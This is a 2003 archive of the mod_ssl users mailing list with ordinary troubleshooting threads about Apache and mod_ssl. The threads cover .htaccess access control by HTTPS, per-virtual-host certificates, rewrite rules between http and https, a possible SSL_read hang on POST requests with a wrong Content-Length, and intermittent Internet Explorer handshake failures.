Received: from filibusta.crema.unimi.it (filibusta.crema.unimi.it [159.149.70.89])
	by master.modssl.org (Postfix) with ESMTP id 10F232AA015
	for ; Sat,  1 Mar 2003 16:54:05 +0100 (CET)
Received: by filibusta.crema.unimi.it (Postfix, from userid 701)
	id 46FC157F; Sat,  1 Mar 2003 16:51:24 +0100 (CET)
Date: Sat, 1 Mar 2003 16:51:24 +0100
To: modssl-users@modssl.org
Subject: HTTPS environment variable is set after .htacces is parsed
Message-ID: <20030301155124.GB8082@filibusta.crema.unimi.it>
Mail-Followup-To: modssl-users@modssl.org
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
	protocol="application/pgp-signature"; boundary="VrqPEDrXMn8OVzN4"
Content-Disposition: inline
User-Agent: Mutt/1.3.28i
From: cavok@filibusta.crema.unimi.it (Domenico Andreoli)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: cavok@filibusta.crema.unimi.it (Domenico Andreoli)
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


--VrqPEDrXMn8OVzN4
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

hi again,

with reference to debian bug report #103609 [1], a debian user states
that HTTPS environment variable is still not set during the parsinig
of .htacces.

i'm quoting the relevant part from that report.

------------- CUT HERE ---------------

This ought to work in .htaccess:

order deny,allow
deny from all
allow from 127.0.0.1
allow from env=HTTPS

...

I can see the HTTPS environment variable in the output if I call
a cgi script that dumps the environment, so it's there, it's just
that somehow at the time that .htaccess is parsed it isn't available
to 'allow from env=' statements yet.

------------- CUT HERE ---------------

i reproduced it with apache 1.3.27 and mod_ssl 2.8.12. so, if it is a
bug, is still present in most recent versions.

any comment?

cheers
cavok

[1] http://bugs.debian.org/103609

-----[ Domenico Andreoli, aka cavok
 --[ http://filibusta.crema.unimi.it/~cavok/gpgkey.asc
   ---[ 3A0F 2F80 F79C 678A 8936  4FEE 0677 9033 A20E BC50

--VrqPEDrXMn8OVzN4
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE+YNb8BneQM6IOvFARAv5jAKDD/8M9+VnnQCPGnnnObETSOyDvwACfSHCW
aqx19sZN50xau9yVfrKmUKM=
=NIoV
-----END PGP SIGNATURE-----

--VrqPEDrXMn8OVzN4--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Mar  1 17:12:02 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8699A2AA050; Sat,  1 Mar 2003 17:12:02 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from bistromath.cs.virginia.edu (va-chrvlle-cad1-bdgrp1-4e-103.chvlva.adelphia.net [24.51.105.103])
	by master.modssl.org (Postfix) with ESMTP id C34372AA021
	for ; Sat,  1 Mar 2003 17:12:00 +0100 (CET)
Received: from localhost (root@localhost)
	by bistromath.cs.virginia.edu (8.12.6/8.11.4) with ESMTP id h21FxXDL001413;
	Sat, 1 Mar 2003 10:59:33 -0500
Date: Sat, 1 Mar 2003 10:59:33 -0500 (EST)
From: Cliff Woolley 
X-X-Sender: root@bistromath.cs.virginia.edu
To: Domenico Andreoli 
Cc: modssl-users@modssl.org
Subject: Re: Illegal attempt to re-initialise SSL for server
In-Reply-To: <20030301152753.GA8082@filibusta.crema.unimi.it>
Message-ID: 
References: <20030301152753.GA8082@filibusta.crema.unimi.it>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Sat, 1 Mar 2003, Domenico Andreoli wrote:

> ---------------- CUT HERE ------------------------------
> # ...
> SSLEngine on
> SSLCertificateFile /etc/apache/ssl.crt/server.crt
> SSLCertificateKeyFile /etc/apache/ssl.key/server.key
>
> 
> 
> # ...
> ---------------- CUT HERE ------------------------------

It ought to look like this:


SSLEngine on
SSLCertificateFile ...
SSLCertificateKeyFile ...


Note that your use of the certificate and key across all virtual hosts,
whether by putting it in the server-wide config or by putting it in
VirtualHost _default_:*, won't generally work.  Your clients will get
errors when they try to browse to your site if the hostname doesn't match
the one stored in the certificate, for example.  You should have a
different certificate/key pair for every hostname on which you wish to run
SSL.  And of course each of those virtual hosts needs to be on a unique
IP:port pair--no name-based virtual hosting.

--Cliff
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Mar  1 17:12:59 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id EDE5E2AA05D; Sat,  1 Mar 2003 17:12:58 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from world.tonkinresolutions.com (233-123.adsl6.netlojix.net [207.71.233.123])
	by master.modssl.org (Postfix) with ESMTP id 2DF402AA051
	for ; Sat,  1 Mar 2003 17:12:57 +0100 (CET)
Received: from world.tonkinresolutions.com (localhost.tonkinresolutions.com [127.0.0.1])
	by world.tonkinresolutions.com (8.12.7/8.12.6) with ESMTP id h21GC3Vk074690
	for ; Sat, 1 Mar 2003 08:12:03 -0800 (PST)
	(envelope-from nick@tonkinresolutions.com)
Received: from localhost (nick@localhost)
	by world.tonkinresolutions.com (8.12.7/8.12.6/Submit) with ESMTP id h21GC3Qo074687
	for ; Sat, 1 Mar 2003 08:12:03 -0800 (PST)
X-Authentication-Warning: world.tonkinresolutions.com: nick owned process doing -bs
Date: Sat, 1 Mar 2003 08:12:03 -0800 (PST)
From: Nick Tonkin 
To: modssl-users@modssl.org
Subject: RE: securing one area of a vhost in apache 2
In-Reply-To: <9B66BBD37D5DD411B8CE00508B69700F033F275C@pborolocal.rnib.org.uk>
Message-ID: <20030228062713.B69108@world.tonkinresolutions.com>
References: <9B66BBD37D5DD411B8CE00508B69700F033F275C@pborolocal.rnib.org.uk>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Nick Tonkin 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Thanks to all who responded on this question.

[ I am now using curl -k to test my self-certified SSL connections :) ]

I have also concluded that the standard way to have one `section' of a
site handled via SSL is to actually have a separate VirtualHost ... maybe
this is obvious but I don't think the documentation made it so. In
particular, I think
http://httpd.apache.org/docs-2.0/ssl/ssl_faq.html#vhosts2 should be placed
more prominently in an introduction area.

Anways, I now have a separate virtual host listening on 443 and serving
https. It is supposed to be only used for the /secure directory, so I am
trying various methods of dealing with relative links, images, etc.

I wanted to build a mod_perl PerlPostReadRequest URI translation
handler to switch back and forth between protocols, but there's a bug or
something with APR::URI at the minute so that attempt is on hold.

I used the recommended mod_rewrite recipe
(http://httpd.apache.org/docs-2.0/ssl/ssl_faq.html#relative) but didn;t
like the extra taglet on the end of my tags (they already get processed by
TT2 and sometimes other stuff), so I went with:

    RewriteCond  %{REQUEST_URI}  !/secure/
    RewriteRule  ^/(.*)$   http://www.ladyraquel.com:8080/$1 [R,L]

in the secure server and

    RewriteCond  %{REQUEST_URI}  /secure/
    RewriteRule  ^/(.*)$   https://secure.ladyraquel.com:8443/$1 [R,L]

in the plain one.

HOWEVER, in both cases I encountered problems with Netscape Navigator 4.08
warning about the >redirect< to the non-secure page. Any suggestions about
this?

Thanks,

- nick

-- 

~~~~~~~~~~~~~~~~~~~~
Nick Tonkin   {|8^)>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Mar  1 17:14:50 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 6A2282AA050; Sat,  1 Mar 2003 17:14:50 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from bistromath.cs.virginia.edu (va-chrvlle-cad1-bdgrp1-4e-103.chvlva.adelphia.net [24.51.105.103])
	by master.modssl.org (Postfix) with ESMTP id 0641E2AA021
	for ; Sat,  1 Mar 2003 17:14:49 +0100 (CET)
Received: from localhost (root@localhost)
	by bistromath.cs.virginia.edu (8.12.6/8.11.4) with ESMTP id h21G2N7g001431;
	Sat, 1 Mar 2003 11:02:23 -0500
Date: Sat, 1 Mar 2003 11:02:22 -0500 (EST)
From: Cliff Woolley 
X-X-Sender: root@bistromath.cs.virginia.edu
To: Domenico Andreoli 
Cc: modssl-users@modssl.org
Subject: Re: HTTPS environment variable is set after .htacces is parsed
In-Reply-To: <20030301155124.GB8082@filibusta.crema.unimi.it>
Message-ID: 
References: <20030301155124.GB8082@filibusta.crema.unimi.it>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Sat, 1 Mar 2003, Domenico Andreoli wrote:

> order deny,allow
> deny from all
> allow from 127.0.0.1
> allow from env=HTTPS

Why do you need that env var?  Use this instead:


order deny,allow
deny from all
allow from 127.0.0.1
SSLRequireSSL


--Cliff
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Mar  1 17:24:23 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D8F8F2AA055; Sat,  1 Mar 2003 17:24:23 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from filibusta.crema.unimi.it (filibusta.crema.unimi.it [159.149.70.89])
	by master.modssl.org (Postfix) with ESMTP id 809962AA051
	for ; Sat,  1 Mar 2003 17:24:22 +0100 (CET)
Received: by filibusta.crema.unimi.it (Postfix, from userid 701)
	id C368157F; Sat,  1 Mar 2003 17:21:41 +0100 (CET)
Date: Sat, 1 Mar 2003 17:21:41 +0100
To: modssl-users@modssl.org
Subject: Re: Illegal attempt to re-initialise SSL for server
Message-ID: <20030301162141.GB13334@filibusta.crema.unimi.it>
Mail-Followup-To: modssl-users@modssl.org
References: <20030301152753.GA8082@filibusta.crema.unimi.it> 
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
	protocol="application/pgp-signature"; boundary="4Ckj6UjgE2iN1+kY"
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.3.28i
From: cavok@filibusta.crema.unimi.it (Domenico Andreoli)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: cavok@filibusta.crema.unimi.it (Domenico Andreoli)
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


--4Ckj6UjgE2iN1+kY
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

On Sat, Mar 01, 2003 at 10:59:33AM -0500, Cliff Woolley wrote:
> It ought to look like this:
>=20
> 
> SSLEngine on
> SSLCertificateFile ...
> SSLCertificateKeyFile ...
> 
>=20
> Note that your use of the certificate and key across all virtual hosts,
> whether by putting it in the server-wide config or by putting it in
> VirtualHost _default_:*, won't generally work.  Your clients will get
> errors when they try to browse to your site if the hostname doesn't match
> the one stored in the certificate, for example.  You should have a
> different certificate/key pair for every hostname on which you wish to run
> SSL.  And of course each of those virtual hosts needs to be on a unique
> IP:port pair--no name-based virtual hosting.
>=20
right right. this is not a issue because this configuration has not
any sense.

many thanks
cavok

ps: may i quote your message? i'd like to include your reply to who reported
the original problem (debian bug report #169083).

-----[ Domenico Andreoli, aka cavok
 --[ http://filibusta.crema.unimi.it/~cavok/gpgkey.asc
   ---[ 3A0F 2F80 F79C 678A 8936  4FEE 0677 9033 A20E BC50

--4Ckj6UjgE2iN1+kY
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE+YN4VBneQM6IOvFARAh8uAKDvgpU4fJcMqnIwv/M6LiHkqWdULwCdGNuX
LTF8soXyAh/kVgW5ZRsz8qo=
=xbmA
-----END PGP SIGNATURE-----

--4Ckj6UjgE2iN1+kY--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Mar  1 17:26:22 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C01262AA051; Sat,  1 Mar 2003 17:26:22 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from filibusta.crema.unimi.it (filibusta.crema.unimi.it [159.149.70.89])
	by master.modssl.org (Postfix) with ESMTP id B19BB2AA024
	for ; Sat,  1 Mar 2003 17:26:21 +0100 (CET)
Received: by filibusta.crema.unimi.it (Postfix, from userid 701)
	id 2FDAE57F; Sat,  1 Mar 2003 17:23:41 +0100 (CET)
Date: Sat, 1 Mar 2003 17:23:41 +0100
To: modssl-users@modssl.org
Subject: Re: HTTPS environment variable is set after .htacces is parsed
Message-ID: <20030301162341.GC13334@filibusta.crema.unimi.it>
Mail-Followup-To: modssl-users@modssl.org
References: <20030301155124.GB8082@filibusta.crema.unimi.it> 
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
	protocol="application/pgp-signature"; boundary="NDin8bjvE/0mNLFQ"
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.3.28i
From: cavok@filibusta.crema.unimi.it (Domenico Andreoli)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: cavok@filibusta.crema.unimi.it (Domenico Andreoli)
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


--NDin8bjvE/0mNLFQ
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

On Sat, Mar 01, 2003 at 11:02:22AM -0500, Cliff Woolley wrote:
> On Sat, 1 Mar 2003, Domenico Andreoli wrote:
>=20
> > order deny,allow
> > deny from all
> > allow from 127.0.0.1
> > allow from env=3DHTTPS
>=20
> Why do you need that env var?  Use this instead:
dunno, bug submitter used it. shouldn't it work anyway?

> order deny,allow
> deny from all
> allow from 127.0.0.1
> SSLRequireSSL
>=20
i'll forward him your answer.

thanks
cavok

-----[ Domenico Andreoli, aka cavok
 --[ http://filibusta.crema.unimi.it/~cavok/gpgkey.asc
   ---[ 3A0F 2F80 F79C 678A 8936  4FEE 0677 9033 A20E BC50

--NDin8bjvE/0mNLFQ
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE+YN6NBneQM6IOvFARAveBAJ9SRLCGhsq/FbSigoxPTbYlYze1bgCg5eYd
/WvzLzR2hO3a/qNUHzVhNOw=
=1B4I
-----END PGP SIGNATURE-----

--NDin8bjvE/0mNLFQ--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Mar  1 17:27:12 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3EA732AA051; Sat,  1 Mar 2003 17:27:12 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from bistromath.cs.virginia.edu (va-chrvlle-cad1-bdgrp1-4e-103.chvlva.adelphia.net [24.51.105.103])
	by master.modssl.org (Postfix) with ESMTP id C87052AA053
	for ; Sat,  1 Mar 2003 17:27:10 +0100 (CET)
Received: from localhost (root@localhost)
	by bistromath.cs.virginia.edu (8.12.6/8.11.4) with ESMTP id h21GEgk2001440
	for ; Sat, 1 Mar 2003 11:14:42 -0500
Date: Sat, 1 Mar 2003 11:14:42 -0500 (EST)
From: Cliff Woolley 
X-X-Sender: root@bistromath.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: Illegal attempt to re-initialise SSL for server
In-Reply-To: <20030301162141.GB13334@filibusta.crema.unimi.it>
Message-ID: 
References: <20030301152753.GA8082@filibusta.crema.unimi.it>
 
 <20030301162141.GB13334@filibusta.crema.unimi.it>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Sat, 1 Mar 2003, Domenico Andreoli wrote:

> ps: may i quote your message? i'd like to include your reply to who
> reported the original problem (debian bug report #169083).

Sure!  It's a public list after all.  :)

--Cliff

---------------------------------------------------------------------
   Cliff Woolley
   Apache HTTP Server Project
   Apache Software Foundation
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Mar  1 17:28:41 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E7F4F2AA05E; Sat,  1 Mar 2003 17:28:40 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from bistromath.cs.virginia.edu (va-chrvlle-cad1-bdgrp1-4e-103.chvlva.adelphia.net [24.51.105.103])
	by master.modssl.org (Postfix) with ESMTP id F049A2AA055
	for ; Sat,  1 Mar 2003 17:28:39 +0100 (CET)
Received: from localhost (root@localhost)
	by bistromath.cs.virginia.edu (8.12.6/8.11.4) with ESMTP id h21GGBAs001443
	for ; Sat, 1 Mar 2003 11:16:11 -0500
Date: Sat, 1 Mar 2003 11:16:11 -0500 (EST)
From: Cliff Woolley 
X-X-Sender: root@bistromath.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: HTTPS environment variable is set after .htacces is parsed
In-Reply-To: <20030301162341.GC13334@filibusta.crema.unimi.it>
Message-ID: 
References: <20030301155124.GB8082@filibusta.crema.unimi.it>
 
 <20030301162341.GC13334@filibusta.crema.unimi.it>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Sat, 1 Mar 2003, Domenico Andreoli wrote:

> dunno, bug submitter used it. shouldn't it work anyway?

Environment variables are, as a rule, set late in the process because the
use of them has a relatively large performance penalty.  They're really
only there for communicating with CGI scripts and the like.

--Cliff
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Mar  1 17:34:27 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 0F9032AA051; Sat,  1 Mar 2003 17:34:27 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from filibusta.crema.unimi.it (filibusta.crema.unimi.it [159.149.70.89])
	by master.modssl.org (Postfix) with ESMTP id A03642AA021
	for ; Sat,  1 Mar 2003 17:34:25 +0100 (CET)
Received: by filibusta.crema.unimi.it (Postfix, from userid 701)
	id E2ABC57F; Sat,  1 Mar 2003 17:31:44 +0100 (CET)
Date: Sat, 1 Mar 2003 17:31:44 +0100
To: modssl-users@modssl.org
Subject: Re: HTTPS environment variable is set after .htacces is parsed
Message-ID: <20030301163144.GE13334@filibusta.crema.unimi.it>
Mail-Followup-To: modssl-users@modssl.org
References: <20030301155124.GB8082@filibusta.crema.unimi.it>  <20030301162341.GC13334@filibusta.crema.unimi.it> 
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
	protocol="application/pgp-signature"; boundary="Fig2xvG2VGoz8o/s"
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.3.28i
From: cavok@filibusta.crema.unimi.it (Domenico Andreoli)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: cavok@filibusta.crema.unimi.it (Domenico Andreoli)
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


--Fig2xvG2VGoz8o/s
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

On Sat, Mar 01, 2003 at 11:16:11AM -0500, Cliff Woolley wrote:
> On Sat, 1 Mar 2003, Domenico Andreoli wrote:
>=20
> > dunno, bug submitter used it. shouldn't it work anyway?
>=20
> Environment variables are, as a rule, set late in the process because the
> use of them has a relatively large performance penalty.  They're really
> only there for communicating with CGI scripts and the like.
>=20
it sounds to me a clear explanation of the problem.

thanks again
domenico

-----[ Domenico Andreoli, aka cavok
 --[ http://filibusta.crema.unimi.it/~cavok/gpgkey.asc
   ---[ 3A0F 2F80 F79C 678A 8936  4FEE 0677 9033 A20E BC50

--Fig2xvG2VGoz8o/s
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE+YOBwBneQM6IOvFARArwkAJ0UFRC5ccwJZTmiRuj0P+AFpmAIQwCg5lAQ
eeeaCt/ysvMFWVgWcDgAwpI=
=dvy2
-----END PGP SIGNATURE-----

--Fig2xvG2VGoz8o/s--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar  3 11:24:42 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7288D2AA030; Mon,  3 Mar 2003 11:24:42 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from neptun.sns-felb.debis.de (neptun.sns-felb.debis.de [53.122.101.2])
	by master.modssl.org (Postfix) with SMTP id 15A682AA01A
	for ; Mon,  3 Mar 2003 11:24:41 +0100 (CET)
Received: by neptun.sns-felb.debis.de; id LAA22113; Mon, 3 Mar 2003 11:24:36 +0100
Received: from unknown(53.113.82.10) by neptun.sns-felb.debis.de via smap (V5.0)
	id xma022105; Mon, 3 Mar 03 11:24:29 +0100
Received: from mail1.c1.dsh.de (localhost [127.0.0.1])
	by dshmail1.dsh.de (8.9.1/8.8.7) with ESMTP id LAA05808
	for ; Mon, 3 Mar 2003 11:24:28 +0100 (MET)
Received: from t-systems.com (lpzpc326.clients.win.c1.dsh.de [172.20.16.226])
	by mail1.c1.dsh.de (8.10.0/8.10.0) with ESMTP id h23AORu28485
	for ; Mon, 3 Mar 2003 11:24:27 +0100
Message-ID: <3E632D5D.7040105@t-systems.com>
Date: Mon, 03 Mar 2003 11:24:29 +0100
From: Dimitri Rebrikov 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.0) Gecko/20020623 Debian/1.0.0-0.woody.1
X-Accept-Language: de-de, en-us, ru
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: (BUG?) mod_ssl/openssl hangs on POST-Request with false Content-Length
References: <3E5FA2CE.2080400@t-systems.com>
X-Enigmail-Version: 0.63.3.0
X-Enigmail-Supports: pgp-inline, pgp-mime
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dimitri Rebrikov 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,
i just have readed the decription of SSL_read() in openssl-0.9.7.

If count of bytes to read is higher than the data avaible to read,
the SSL_read will block if the underlying BIO is in blocking mode.
(IMHO that is the akutell situation in Apache/mod_ssl).

It is possible to make underlying BIO nonblocking...
(i have tried this with fcntl() just befor SSL_read-call)
But if underlying BIO is non-blocking the SSL_read will return
(unter the same circumstances as above) the -1 Errorcode and
SSL_ERROR_WANT_READ SSL-error. The mod_ssl(ssl_io_hook_read)
casts this Error as EINTR. The reaction of Apache on EINTR is
to recall of read operation (apache/buff.c/saferead_guts()).
This leads finally to dead loop (without timeout) beetwen Apache
and mod_ssl.

Perhaps, the mod_ssl schould check in which mode (blocking/nonblocking)
the underlying BIO is (f.e. with fcntl()), and do correspond pre-read-checking
(select() or nothing) and post-read-handling (EINTR-Casting oder nothing)...

What do you think about that?

Best regards
Dimitri
-- 

------------------------------------------------------------------------
Dimitri Rebrikov
*T-Systems GEI GmbH*
Projektentwickler
Postanschrift: Prager Straße 15, D-04103 Leipzig
Telefon:         (0341) 1275-439
Telefax:         (0341) 1275-333
E-Mail:          Dimitri.Rebrikov@t-systems.com

Internet:         http://www.t-systems.com
------------------------------------------------------------------------

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar  4 14:00:46 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id BBA1A2AA02E; Tue,  4 Mar 2003 14:00:46 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cus.org.uk (host213-106-240-81.no-dns-yet.ntli.net [213.106.240.81])
	by master.modssl.org (Postfix) with ESMTP id BB9702AA015
	for ; Tue,  4 Mar 2003 14:00:44 +0100 (CET)
Received: from cus.org.uk (localhost.cus.org.uk [127.0.0.1])
	by cus.org.uk (8.12.6/8.11.3) with ESMTP id h24D0h9M003829
	for ; Tue, 4 Mar 2003 13:00:43 GMT
	(envelope-from markb@cus.org.uk)
Received: from localhost (markb@localhost)
	by cus.org.uk (8.12.6/8.12.6/Submit) with ESMTP id h24D0hAq003826
	for ; Tue, 4 Mar 2003 13:00:43 GMT
Date: Tue, 4 Mar 2003 13:00:43 +0000 (GMT)
From: Mark Boddington 
To: modssl-users@modssl.org
Subject: intermittent IE problem
Message-ID: <20030304121358.J3032@cus.org.uk>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mark Boddington 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi all,

system:  Solaris 7 sparc
Apache:	 1.3.27
ModSSL:  2.8.12
OpenSSL: 0.9.7a

Is anyone else experiencing any difficulty with IE5.x and the latest
apache/mod_ssl ? My current live system is Apache/1.3.26 ModSSL/2.8.10
OpenSSL 0.9.6e-engine. I'm using an Ncipher SSL accelerator with chil
engine. All is working fine.

I have the User-Agent ".*MSIE.*" work around in place.
I have a SSLSessionCache and my SSLSessionCacheTimeout is 300.

When I upgrade to the newest componants I get intermittent IE "Page cannot
be displayed" problems. I've been sniffing the connection, but I have not
been able to identify the problem yet. It doesn't seem to occur on an
initial connection, when IE sends the hello using SSLv2, but on subsequent
connections when IE has the certificate and uses SSLv3 for the hello.

The Initial connection always seems to work:

Client -> server  SSLv2  Client Hello
Server -> client  SSLv3  Server Hello, Certificate
Client -> server  SSLv3  Client key exchange, Change cipher, handshake
Server -> client  SSLv3  Change cipher, handshake
Server <> client  SSLv3  Data

However following connections may fail:

Client -> server  SSLv3  Client Hello
Server -> client  SSLv3  Server Hello, Change cipher, handshake

	At this point either:
		IE closes the connection.
	OR:
		The handshake continues.

Client -> server  SSLv3  Change cipher, handshake
Server <> client  SSLv3  Data

Any ideas anyone ??
Thanks in advance,

Mark
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar  4 17:03:37 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C24412AA02E; Tue,  4 Mar 2003 17:03:37 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
